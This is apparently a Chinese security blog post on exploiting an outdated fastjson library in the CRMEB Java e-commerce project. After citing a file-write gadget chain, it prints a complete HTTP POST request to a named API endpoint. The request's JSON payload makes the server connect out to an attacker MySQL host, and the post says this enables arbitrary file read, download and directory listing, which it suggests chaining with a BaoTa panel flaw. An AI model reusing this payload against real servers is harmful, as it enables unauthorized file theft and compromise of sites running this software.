4.5K start 2K fork的项目,之前用了低版本的fastjson,新版本修复了。
https://gitee.com/ZhongBangKeJi/crmeb\_java
之前用1.2.56版本fastjson,1.2.68公开的有fastjson commons-io AutoCloseable写任意文件,本地测payload没问题,真实场景利用不了
引用su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737
注意:由于 fastjson 获取 WriterOutputStream 的构造方法时并不唯一,所以这个 payload 并不是每次都能触发,需要等随机到带有指定参数的构造方法才能触发,测试的小伙伴多测几次就可以写入了。如果你有解决这个问题的办法请联系我。
springboot来说也有点鸡肋,在blackhat 2021有人提出了新的姿势:
刚好可以配合mysql的jdbc,让fastjson主动去链接我的mysql,根据已学知识,我们在继续构造payload,再利用"allowUrlInLocalInfile":"true","allowLoadLocalInfile":"true","allowLoadLocalInfileInPath":"/",
可以构成任意文件读取&&任意文件下载,下载jar包,,利用file:// 可以做到列目录,再与宝塔漏洞再进行利用无敌。
show code:
POST /api/public/wechat/gitlab?token=aa HTTP/1.1
Host: 192.168.220.2:8081
Content\-Length: 479
Request\-Origion: SwaggerBootstrapUi
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Authori-zation:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.220.2:8081
Referer: http://192.168.220.2:8081/doc.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"xxxxx","portToConnectTo":1234,"databaseToConnectTo":"test","info": {"@type":"java.util.Properties","PORT":"1234",
"allowUrlInLocalInfile":"true",
"allowLoadLocalInfile":"true",
"allowLoadLocalInfileInPath":"/",
"maxAllowedPacket":"655360",
"user":"fileread\_file:///.","PORT.1":"1234","HOST.1":"xxxxxxxxx","NUM\_HOSTS":"1","HOST":"xxxxx","DBNAME":"test"}